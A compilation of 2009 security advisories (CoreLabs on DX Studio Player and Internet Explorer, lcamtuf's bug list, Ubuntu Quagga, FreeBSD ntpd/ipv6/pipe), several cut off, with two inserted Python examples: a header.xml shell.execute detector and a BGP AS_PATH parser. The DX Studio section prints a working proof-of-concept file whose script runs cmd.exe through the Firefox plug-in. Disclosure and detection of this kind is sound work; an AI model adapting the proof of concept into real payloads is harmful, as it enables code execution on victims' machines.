CORE-2009-0521 - DX Studio Player Firefox plug-in command injection
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

     Core Security Technologies - CoreLabs Advisory
          http://www.coresecurity.com/corelabs/

    DX Studio Player Firefox plug-in command injection

1. *Advisory Information*

Title: DX Studio Player Firefox plug-in command injection
Advisory ID: CORE-2009-0521
Advisory URL: http://www.coresecurity.com/content/DXStudio-player-firefox-plugin
Date published: 2009-06-09
Date of last update: 2009-06-09
Vendors contacted: Worldweaver
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Command injection
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-2011

3. *Vulnerability Description*

DX Studio [1] is a complete integrated development environment for creating interactive 3D graphics. The DX Studio Player plug-in for Firefox [2] is vulnerable to remote command execution.

4. *Vulnerable packages*

   . DX Studio Player v3.0.29.0
   . DX Studio Player v3.0.22.0
   . DX Studio Player v3.0.12.0
   . Older versions are probably affected too, but they were not checked.

5. *Non-vulnerable packages*

   . DX Studio Player v3.0.29.1

6. *Vendor Information, Solutions and Workarounds*

On June 1st the DXStudio team patched the current release 3.0.29 to 3.0.29.1 for all new downloads to fix the problem with the Firefox plug-in, and also posted a sticky announcement for all its users [3].

7. *Credits*

This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies.

8. *Technical Description / Proof of Concept Code*

DX Studio is a complete integrated development environment for creating interactive 3D graphics. DX Studio provides a JavaScript API in which the method 'shell.execute()' is documented as follows:

/-----------
Prototype: shell.execute(commandString, [paramString], [commandIsProgId]);
-----------/

This method sends the 'commandString' to the Windows shell with optional parameters in 'paramString'. For security reasons, this function is not available when running in a web browser. If you set 'commandIsProgId' to true, you can launch a utility by its 'ProgID', e.g. 'WMP.DVD' with parameter 'play' would play a DVD in Windows Media Player.

In our tests, despite what is stated in the documentation, we found that the function is actually available to both the Internet Explorer and Firefox browser plug-ins. In the IE plug-in the user does get a warning about the security implications of allowing such a '.dxstudio' file to run. On Firefox, however, there is no such warning whatsoever, allowing an attacker to execute arbitrary code on the client side by luring the victim into clicking a link or visiting a malicious website.

8.1. *Proof of Concept (header.xml)*

/-----------
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<dxstudio version="1.0.0" width="800" height="600" defaultscriptlanguage="javascript">
  <display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no" maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes" changeresolution="no" userresize="yes" workarea="no" windowmask="no" src="" minplayerversion="1.0.0">
    <loading console="yes" custom="no" custombackground="no" customlogo="yes" showversion="no">
      <prop id="background" type="color" r="0" g="0" b="0" a="1" />
      <logo src="" />
      <customprogress />
    </loading>
  </display>
  <script><![CDATA[
function onInit() {
  shell.execute("cmd.exe", "/k cls|@echo this is wrong, very wrong.");
}
]]></script>
  <licenseinfo stamp="cgda" />
  <security>
    <prop id="password" type="string" value="" />
    <prop id="allowplayer" type="bool" state="no" />
    <prop id="nocache" type="bool" state="yes" />
  </security>
</dxstudio>
-----------/

Note: The vulnerability is also exploitable on the standalone player; however, there this functionality appears to be the expected behavior and fully intended.

9. *Report Timeline*

. 2009-05-21: Core Security Technologies notifies the Worldweaver Support Team (WST) of the vulnerability and announces its initial plan to publish the content on June 15th, 2009.
. 2009-05-26: The WST asks Core for a technical description of the vulnerability.
. 2009-05-26: Technical details sent to WST by Core.
. 2009-06-08: Core asks WST for an estimated date to fix this issue.
. 2009-06-08: WST notifies Core that a fix has already been produced and is available to users.
. 2009-06-09: The advisory CORE-2009-0521 is published.

10. *References*

[1] http://www.dxstudio.com
[2] http://www.dxstudio.com/download2.aspx
[3] http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd

11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem
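The point of the advisory is that a '.dxstudio' document can carry a script calling 'shell.execute()' and the Firefox plug-in runs it with no prompt. As an added example, not part of the CoreLabs advisory and not DX Studio code, the Python below inspects a header.xml of the shape shown in the PoC and reports every script line that calls that API, which is the check a mail gateway or web proxy could apply to inbound '.dxstudio' content. It assumes the document is a standalone header.xml (not the packaged form of the file); both sample documents are constructed for this example.

```python
"""Report shell.execute() calls in DX Studio header.xml documents.

Added example (not CoreLabs or DX Studio code). It assumes the header.xml
layout shown in the advisory PoC: a <dxstudio> root with <script> children
whose JavaScript body is wrapped in CDATA. Both sample documents below are
constructed for this example.
"""
import re
import xml.etree.ElementTree as ET

# The API named in the advisory. The script body is plain JavaScript, so a
# regex over each line is enough to spot the call; tolerate stray whitespace.
SHELL_EXECUTE_RE = re.compile(r"\bshell\s*\.\s*execute\s*\(", re.IGNORECASE)

MALICIOUS_HEADER = """<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<dxstudio version="1.0.0" width="800" height="600" defaultscriptlanguage="javascript">
  <script><![CDATA[
function onInit() {
  shell.execute("cmd.exe", "/k cls|@echo this is wrong, very wrong.");
}
]]></script>
  <security>
    <prop id="allowplayer" type="bool" state="no" />
  </security>
</dxstudio>
"""

BENIGN_HEADER = """<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<dxstudio version="1.0.0" width="800" height="600" defaultscriptlanguage="javascript">
  <script><![CDATA[
function onInit() {
  var ready = true;   // constructed sample: no shell access
}
]]></script>
</dxstudio>
"""


def find_shell_execute(header_xml: str) -> list:
    """Return (script_index, line) for every script line calling shell.execute().

    Malformed XML is reported as a hit as well: content that cannot be parsed
    should not be passed on to the plug-in unexamined.
    """
    try:
        root = ET.fromstring(header_xml)
    except ET.ParseError as exc:
        return [(-1, "unparseable header.xml: %s" % exc)]
    hits = []
    for idx, script in enumerate(root.iter("script")):
        for line in (script.text or "").splitlines():
            if SHELL_EXECUTE_RE.search(line):
                hits.append((idx, line.strip()))
    return hits


def should_block(header_xml: str) -> bool:
    """True when the document must not reach a browser plug-in."""
    return bool(find_shell_execute(header_xml))


if __name__ == "__main__":
    for name, doc in (("malicious", MALICIOUS_HEADER), ("benign", BENIGN_HEADER)):
        verdict = "block" if should_block(doc) else "allow"
        print(name, verdict, find_shell_execute(doc))
```

Run stand-alone it prints a verdict for each sample. The check is deliberately conservative: anything that fails to parse is blocked rather than handed on, since the plug-in, not this filter, is the component that would otherwise decide.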
CORE-2008-0826 - Internet Explorer Security Zone restrictions bypass
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

     Core Security Technologies - CoreLabs Advisory
          http://www.coresecurity.com/corelabs/

    Internet Explorer Security Zone restrictions bypass

1. *Advisory Information*

Title: Internet Explorer Security Zone restrictions bypass
Advisory ID: CORE-2008-0826
Advisory URL: http://www.coresecurity.com/content/ie-security-zone-bypass
Date published: 2009-06-09
Date of last update: 2009-06-09
Vendors contacted: Microsoft
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Client side
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: 33178
CVE Name: CVE-2009-1140

3. *Vulnerability Description*

Internet Explorer (IE) is the most widely used Web browser, with an estimated 1,100 million users according to a worldwide survey conducted and published in 2008 [1].

This advisory describes a vulnerability that provides access to the contents of any file stored on the local filesystem of a user's machine running a vulnerable version of IE. Exploitation relies solely on the attacker's ability to serve malicious HTML content from a website and to predict the full pathname of the file that will be used to cache it locally on the victim's system. If the entire pathname can be predicted, the attacker can redirect the browser to the locally stored file using a URI in UNC form and force the local content to be rendered as an HTML document, which permits running script and instantiating certain ActiveX controls.

As a result of a successful attack, security- or privacy-sensitive information can be obtained by an attacker, including but not limited to user authentication credentials for any web application domain, HTTP cookies, session management data, cached content of web applications in different domains, and any files stored on the local filesystem.

The bug is a lack of enforcement of the security policies assigned to URL Security Zones [2] when content from the corresponding zone is loaded and rendered from a local file. The issues were found in the way security policies are applied when a URI is specified in UNC form (i.e. '\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'):

   1. When a remote site attempts to access a local resource, IE fails to enforce the Zone Elevation restrictions.
   2. When browsing a remote site, IE does not properly enforce the Security Zone permissions, allowing a site belonging to a less secure zone to be treated as belonging to a more privileged one.

4. *Vulnerable packages*

   . Internet Explorer 5.01 Service Pack 4
   . Internet Explorer 6.0
   . Internet Explorer 6.0 Service Pack 1
   . Internet Explorer 7 (not exploitable with Protected Mode on, available on Vista)

4.1. *Vulnerable platforms*

   . Microsoft Windows 2000 up to and including Service Pack 4
   . Microsoft Windows Server 2003 up to and including Service Pack 2
   . Microsoft Windows XP up to and including Service Pack 3
   . Windows Vista up to and including Service Pack 1 (not exploitable with IE running with Protected Mode on)
   . Windows Server 2008

5. *Non-vulnerable packages*

   . Internet Explorer 8 under Windows 2000/2003/XP/Vista

6. *Vendor Information, Solutions and Workarounds*

The following workarounds can prevent exploitation of the vulnerability:

   . Use Internet Explorer's Protocol Lockdown feature control to restrict the file protocol, so that HTML loaded from a UNC path cannot run script or ActiveX controls.
   . Set the Security Level for the Internet and Intranet Zones to High to prevent IE from running scripts or ActiveX controls.
   . Manually disable Active Scripting for the Internet and Intranet Zones with a custom security setting.
   . Only run IE in Protected Mode if it is available on the operating system.
   . Use a different web browser to navigate untrusted web sites.

Additionally, disabling file sharing where it is not needed and filtering outbound SMB connections at the endpoint or network perimeter may not prevent exploitation, but both are generally good security measures and also prevent disclosure of sensitive information such as valid usernames of endpoint users.

Microsoft has issued a patch to fix the vulnerability and a detailed description of how to implement the workarounds on IE. It is available as Security Bulletin http://go.microsoft.com/fwlink/?LinkID=150860. Microsoft's Security Research and Defense blog has further discussion about the vulnerability, workarounds and mitigations [3].

7. *Credits*

This vulnerability was discovered and researched by Jorge Luis Alvarez Medina from Core Security Consulting Services (SCS). Additional research was made by Federico Muttis from Core Security Exploit Writers Team (EWT).

8. *Technical Description / Proof of Concept Code*

Internet Explorer uses a feature known as URL Security Zones [2], which defines a set of privileges for Web sites and applications
catching up on several recently fixed bugs of note
Hi all,

I am way behind on this, so I wanted to drop a quick note regarding some of my vulnerabilities recently addressed by browser vendors - and provide some possibly interesting PoCs / fuzzers to go with them:

Summary  : MSIE same-origin bypass race condition (CVE-2007-3091)
Impact   : security bypass, possibly more
Reported : June 2007 (publicly)
PoC URL  : http://lcamtuf.coredump.cx/ierace/
Bulletin : http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx
Notes    : additional credit to David Bloom for developing an improved proof-of-concept exploit

Summary  : MSIE memory corruption on page transitions
Impact   : memory corruption, potential code execution
Reported : April 2008 (privately)
PoC URL  : http://lcamtuf.coredump.cx/stest/ (fuzzers)
Bulletin : http://www.microsoft.com/technet/security/Bulletin/MS09-014.mspx
Notes    : -

Summary  : multiple browsers CANVAS implementation crashes (CVE-2008-2321, ???)
Impact   : memory corruption, potential code execution
Reported : February 2008 (privately)
PoC URL  : http://lcamtuf.coredump.cx/canvas/ (fuzzer)
Bulletin : http://lists.apple.com/archives/security-announce/2009/Jun/msg2.html
Bulletin : http://www.opera.com/support/kb/view/882/
Notes    : also some DoS issues in Firefox

Summary  : Safari page transition tailgating (CVE-2009-1684)
Impact   : page spoofing, navigation target disclosure
Reported : February 2008 (privately)
PoC URL  : http://lcamtuf.coredump.cx/sftrap2/
Bulletin : http://lists.apple.com/archives/security-announce/2009/Jun/msg2.html
Notes    : -

Cheers,
/mz
[USN-775-2] Quagga regression
===========================================================
Ubuntu Security Notice USN-775-2             June 09, 2009
quagga regression
https://launchpad.net/bugs/384193
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  quagga                          0.99.2-1ubuntu3.6

Ubuntu 8.04 LTS:
  quagga                          0.99.9-2ubuntu1.3

Ubuntu 8.10:
  quagga                          0.99.9-6ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-775-1 fixed vulnerabilities in Quagga. The preventative fixes
introduced in Quagga prior to Ubuntu 9.04 could result in BGP service
failures. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 It was discovered that the BGP service in Quagga did not correctly
 handle certain AS paths containing 4-byte ASNs. An authenticated remote
 attacker could exploit this flaw to cause bgpd to abort, leading to a
 denial of service.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6.diff.gz
      Size/MD5:    33723 68d422d6bc1144c884c8d3464b2d7132
    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6.dsc
      Size/MD5:      808 f99f295766118d53be45a1186c2c0a98
    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2.orig.tar.gz
      Size/MD5:  2185137 88087d90697fcf5fe192352634f340b3

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.2-1ubuntu3.6_all.deb
      Size/MD5:   664150 cdb4f6e8bd79bd87efb0e0c083ea5102

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_amd64.deb
      Size/MD5:  1404194 f771faa047cb099f9c2413e9f06a9228

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_i386.deb
      Size/MD5:  1199178 8c288bcee96507962ffb0b95e26cc77c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_powerpc.deb
      Size/MD5:  1351356 8803c7a2df4bdc196a8746199badd6c7

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_sparc.deb
      Size/MD5:  1322370 0412d82e928f89a739287456b43f355a

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3.diff.gz
      Size/MD5:    35961 52f3b6d3d31515936f582dea2ff81322
    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3.dsc
      Size/MD5:     1022 d4a0caac214e93c40cb73c5066dca423
    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9.orig.tar.gz
      Size/MD5:  2341067 4dbdaf91bf6609803819d97d5fccc4c9

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.9-2ubuntu1.3_all.deb
      Size/MD5:   661722 a301f125c189a5147022712c7beb043d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_amd64.deb
      Size/MD5:  1619806 e455a7297029d4041f67e88ba20e3c04

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_i386.deb
      Size/MD5:  1464714 0dbc4715b946e5acf8ce082cc7e4d84c

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_lpia.deb
      Size/MD5:  1461224 de1ec96b620619222ddb8f14a62a2b2c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_powerpc.deb
      Size/MD5:  1658750 10e87db24545fd262e9ab09c454dbcb3

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_sparc.deb
      Size/MD5:  1521338 da17c3904269a1c02f44c885ea11910e

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2.diff.gz
      Size/MD5:    35942 c398f6251074d10961f61146438ca43b
    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2.dsc
      Size/MD5:     1486 69e9c33ac728149c88a14e9ec3aa3d19
    http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9.orig.tar.gz
      Size/MD5:  2341067 4dbdaf91bf6609803819d97d5fccc4c9

  Architecture independent
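The flaw behind USN-775-1 and this regression notice is the handling of AS paths carrying 4-byte ASNs. As an added example, not Quagga code and not a reproduction of its bug, the Python below encodes and parses a BGP AS_PATH attribute at either ASN width and rejects truncated or mis-sized paths with an exception, which is what a speaker needs to do instead of aborting. The wire layout follows RFC 4271 (segments of type, count, ASNs) and RFC 4893 (4-octet ASNs, with AS_TRANS 23456 substituted toward 2-byte-only peers); the sample paths are constructed.

```python
"""Parse and encode a BGP AS_PATH attribute with 2-byte or 4-byte ASNs.

Added example, not Quagga code. Layout per RFC 4271 (segment = type, count,
ASNs) and RFC 4893 (4-octet ASNs; AS_TRANS placeholder). Every length is
checked against the remaining bytes, so a path whose ASN width does not match
the session raises MalformedASPath instead of running the parser off the end.
"""
import struct

AS_SET = 1
AS_SEQUENCE = 2
AS_TRANS = 23456  # stands in for a 4-byte ASN on a session without 4-octet AS support


class MalformedASPath(ValueError):
    """Raised for any AS_PATH that does not fit the negotiated ASN width."""


def parse_as_path(attr: bytes, asn_size: int) -> list:
    """Return [(segment_type, [asn, ...]), ...] or raise MalformedASPath.

    asn_size is 2 for a classic peer and 4 when the 4-octet AS capability
    was negotiated on the session.
    """
    if asn_size not in (2, 4):
        raise ValueError("asn_size must be 2 or 4")
    fmt_code = "H" if asn_size == 2 else "I"
    segments = []
    pos = 0
    while pos < len(attr):
        if len(attr) - pos < 2:
            raise MalformedASPath("truncated segment header at offset %d" % pos)
        seg_type, count = attr[pos], attr[pos + 1]
        pos += 2
        if seg_type not in (AS_SET, AS_SEQUENCE):
            raise MalformedASPath("unknown segment type %d at offset %d" % (seg_type, pos - 2))
        if count == 0:
            raise MalformedASPath("empty segment at offset %d" % (pos - 2))
        need = count * asn_size
        if len(attr) - pos < need:
            raise MalformedASPath("segment needs %d bytes, only %d left" % (need, len(attr) - pos))
        asns = list(struct.unpack(">%d%s" % (count, fmt_code), attr[pos:pos + need]))
        pos += need
        segments.append((seg_type, asns))
    return segments


def encode_as_path(segments, asn_size: int) -> bytes:
    """Inverse of parse_as_path; 4-byte ASNs become AS_TRANS on a 2-byte session."""
    fmt_code = "H" if asn_size == 2 else "I"
    out = bytearray()
    for seg_type, asns in segments:
        if not 1 <= len(asns) <= 255:
            raise ValueError("a segment holds 1..255 ASNs")
        wire = [a if (asn_size == 4 or a <= 0xFFFF) else AS_TRANS for a in asns]
        out += struct.pack(">BB%d%s" % (len(wire), fmt_code), seg_type, len(wire), *wire)
    return bytes(out)


def as_path_str(segments) -> str:
    """Render the path as routers show it: sequences space-separated, sets in braces."""
    parts = []
    for seg_type, asns in segments:
        if seg_type == AS_SET:
            parts.append("{%s}" % ",".join(str(a) for a in asns))
        else:
            parts.append(" ".join(str(a) for a in asns))
    return " ".join(parts)


if __name__ == "__main__":
    # Constructed path mixing a 2-byte-representable ASN with two 4-byte ones.
    path = [(AS_SEQUENCE, [64512, 65536, 4200000000])]
    wire4 = encode_as_path(path, 4)
    print(as_path_str(parse_as_path(wire4, 4)))
    print(as_path_str(parse_as_path(encode_as_path(path, 2), 2)))
    try:
        parse_as_path(wire4, 2)  # 4-byte path read at the wrong width
    except MalformedASPath as exc:
        print("rejected:", exc)
```

Reading the 4-byte encoding at 2-byte width does not silently produce a wrong path: the first segment consumes only half its bytes and the leftover then fails the segment-type check, so the attribute is rejected as a unit rather than partially accepted.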
FreeBSD Security Advisory FreeBSD-SA-09:11.ntpd
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-09:11.ntpd                                       Security Advisory
                                                          The FreeBSD Project

Topic:          ntpd stack-based buffer-overflow vulnerability

Category:       contrib
Module:         ntpd
Announced:      2009-06-10
Credits:        Chris Ries
Affects:        All supported versions of FreeBSD.
Corrected:      2009-06-10 10:31:11 UTC (RELENG_7, 7.2-STABLE)
                2009-06-10 10:31:11 UTC (RELENG_7_2, 7.2-RELEASE-p1)
                2009-06-10 10:31:11 UTC (RELENG_7_1, 7.1-RELEASE-p6)
                2009-06-10 10:31:11 UTC (RELENG_6, 6.4-STABLE)
                2009-06-10 10:31:11 UTC (RELENG_6_4, 6.4-RELEASE-p5)
                2009-06-10 10:31:11 UTC (RELENG_6_3, 6.3-RELEASE-p11)
CVE Name:       CVE-2009-1252

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

The ntpd(8) daemon is an implementation of the Network Time Protocol
(NTP) used to synchronize the time of a computer system to a reference
time source.

Autokey is a security model for authenticating Network Time Protocol
(NTP) servers to clients, using public key cryptography.

II.  Problem Description

The ntpd(8) daemon is prone to a stack-based buffer-overflow when it is
configured to use the 'autokey' security model.

III. Impact

This issue could be exploited to execute arbitrary code in the context
of the service daemon, or crash the service daemon, causing a denial of
service.

IV.  Workaround

Use IP based restrictions in ntpd(8) itself or in IP firewalls to
restrict which systems can send NTP packets to ntpd(8).

Note that systems will only be affected if they have the autokey option
set in /etc/ntp.conf; FreeBSD does not ship with a default ntp.conf
file, so will not be affected unless this option has been explicitly
enabled by the system administrator.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the
RELENG_7_2, RELENG_7_1, RELENG_6_4, or RELENG_6_3 security branch
dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 6.3, 6.4,
7.1, and 7.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 6.3]
# fetch http://security.FreeBSD.org/patches/SA-09:11/ntpd63.patch
# fetch http://security.FreeBSD.org/patches/SA-09:11/ntpd63.patch.asc

[FreeBSD 6.4 and 7.x]
# fetch http://security.FreeBSD.org/patches/SA-09:11/ntpd.patch
# fetch http://security.FreeBSD.org/patches/SA-09:11/ntpd.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/usr.sbin/ntp/ntpd
# make obj && make depend && make && make install
# /etc/rc.d/ntpd restart

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

CVS:

Branch                                                           Revision
  Path
- -------------------------------------------------------------------------
RELENG_6
  src/contrib/ntp/ntpd/ntp_crypto.c                              1.1.1.3.8.3
RELENG_6_4
  src/UPDATING                                                1.416.2.40.2.9
  src/sys/conf/newvers.sh                                     1.69.2.18.2.11
  src/contrib/ntp/ntpd/ntp_crypto.c                          1.1.1.3.8.1.2.2
RELENG_6_3
  src/UPDATING                                               1.416.2.37.2.16
  src/sys/conf/newvers.sh                                     1.69.2.15.2.15
  src/contrib/ntp/ntpd/ntp_crypto.c                             1.1.1.3.20.2
RELENG_7
  src/contrib/ntp/ntpd/ntp_crypto.c                             1.1.1.3.18.3
RELENG_7_2
  src/UPDATING                                                1.507.2.23.2.4
  src/sys/conf/newvers.sh                                      1.72.2.11.2.5
  src/contrib/ntp/ntpd/ntp_crypto.c                         1.1.1.3.18.2.2.1
RELENG_7_1
  src/UPDATING                                                1.507.2.13.2.9
  src/sys/conf/newvers.sh                                      1.72.2.9.2.10
  src/contrib/ntp/ntpd/ntp_crypto.c                         1.1.1.3.18.1.2.2
- -------------------------------------------------------------------------

Subversion:

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/6/                                                         r193893
releng/6.4/                                                       r193893
releng/6.3/                                                       r193893
stable/7/
FreeBSD Security Advisory FreeBSD-SA-09:10.ipv6
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-09:10.ipv6                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Missing permission check on SIOCSIFINFO_IN6 ioctl

Category:       core
Module:         netinet6
Announced:      2009-06-10
Credits:        Hiroki Sato
Affects:        All supported versions of FreeBSD.
Corrected:      2009-06-10 10:31:11 UTC (RELENG_7, 7.2-STABLE)
                2009-06-10 10:31:11 UTC (RELENG_7_2, 7.2-RELEASE-p1)
                2009-06-10 10:31:11 UTC (RELENG_7_1, 7.1-RELEASE-p6)
                2009-06-10 10:31:11 UTC (RELENG_6, 6.4-STABLE)
                2009-06-10 10:31:11 UTC (RELENG_6_4, 6.4-RELEASE-p5)
                2009-06-10 10:31:11 UTC (RELENG_6_3, 6.3-RELEASE-p11)

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

IPv6 is a new Internet Protocol, designed to replace (and avoid many of
the problems with) the current Internet Protocol (version 4). Many
properties of the FreeBSD IPv6 network stack can be configured via the
ioctl(2) interface.

II.  Problem Description

The SIOCSIFINFO_IN6 ioctl is missing a necessary permissions check.

III. Impact

Local users, including non-root users and users inside jails, can set
some IPv6 interface properties. These include changing the link MTU and
disabling interfaces entirely.

Note that this affects IPv6 only; IPv4 functionality cannot be affected
by exploiting this vulnerability.

IV.  Workaround

No workaround is available, but systems without local untrusted users
are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the
RELENG_7_2, RELENG_7_1, RELENG_6_4, or RELENG_6_3 security branch
dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 6.3, 6.4,
7.1, and 7.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 6.x]
# fetch http://security.FreeBSD.org/patches/SA-09:10/ipv6-6.patch
# fetch http://security.FreeBSD.org/patches/SA-09:10/ipv6-6.patch.asc

[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-09:10/ipv6.patch
# fetch http://security.FreeBSD.org/patches/SA-09:10/ipv6.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

CVS:

Branch                                                           Revision
  Path
- -------------------------------------------------------------------------
RELENG_6
  src/sys/netinet6/in6.c                                         1.51.2.13
RELENG_6_4
  src/UPDATING                                                1.416.2.40.2.9
  src/sys/conf/newvers.sh                                     1.69.2.18.2.11
  src/sys/netinet6/in6.c                                     1.51.2.12.2.2
RELENG_6_3
  src/UPDATING                                               1.416.2.37.2.16
  src/sys/conf/newvers.sh                                     1.69.2.15.2.15
  src/sys/netinet6/in6.c                                     1.51.2.11.2.1
RELENG_7
  src/sys/netinet6/in6.c                                          1.73.2.7
RELENG_7_2
  src/UPDATING                                                1.507.2.23.2.4
  src/sys/conf/newvers.sh                                      1.72.2.11.2.5
  src/sys/netinet6/in6.c                                      1.73.2.6.2.2
RELENG_7_1
  src/UPDATING                                                1.507.2.13.2.9
  src/sys/conf/newvers.sh                                      1.72.2.9.2.10
  src/sys/netinet6/in6.c                                      1.73.2.4.2.2
- -------------------------------------------------------------------------

Subversion:

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/6/                                                         r193893
releng/6.4/                                                       r193893
releng/6.3/                                                       r193893
stable/7/                                                         r193893
releng/7.2/                                                       r193893
releng/7.1/                                                       r193893
- -------------------------------------------------------------------------

VII. References

The latest revision of this advisory is
FreeBSD Security Advisory FreeBSD-SA-09:09.pipe
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-09:09.pipe                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Local information disclosure via direct pipe writes

Category:       core
Module:         kern
Announced:      2009-06-10
Credits:        Pieter de Boer
Affects:        All supported versions of FreeBSD.
Corrected:      2009-06-10 10:31:11 UTC (RELENG_7, 7.2-STABLE)
                2009-06-10 10:31:11 UTC (RELENG_7_2, 7.2-RELEASE-p1)
                2009-06-10 10:31:11 UTC (RELENG_7_1, 7.1-RELEASE-p6)
                2009-06-10 10:31:11 UTC (RELENG_6, 6.4-STABLE)
                2009-06-10 10:31:11 UTC (RELENG_6_4, 6.4-RELEASE-p5)
                2009-06-10 10:31:11 UTC (RELENG_6_3, 6.3-RELEASE-p11)

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

One of the most commonly used forms of interprocess communication on
FreeBSD and other UNIX-like systems is the (anonymous) pipe. In this
mechanism, a pair of file descriptors is created, and data written to
one descriptor can be read from the other.

FreeBSD's pipe implementation contains an optimization known as direct
writes. In this optimization, rather than copying data into kernel
memory when the write(2) system call is invoked and then copying the
data again when the read(2) system call is invoked, the FreeBSD kernel
takes advantage of virtual memory mapping to allow the data to be
copied directly between processes.

II.  Problem Description

An integer overflow in computing the set of pages containing data to be
copied can result in virtual-to-physical address lookups not being
performed.

III. Impact

An unprivileged process can read pages of memory which belong to other
processes or to the kernel. These may contain information which is
sensitive in itself; or may contain passwords or cryptographic keys
which can be indirectly exploited to gain sensitive information or
access.

IV.  Workaround

No workaround is available, but systems without untrusted local users
are not vulnerable.

System administrators are reminded that even if a system is not
intended to have untrusted local users, it may be possible for an
attacker to exploit some other vulnerability to obtain local user
access to a system.

V.   Solution

Perform one of the following:

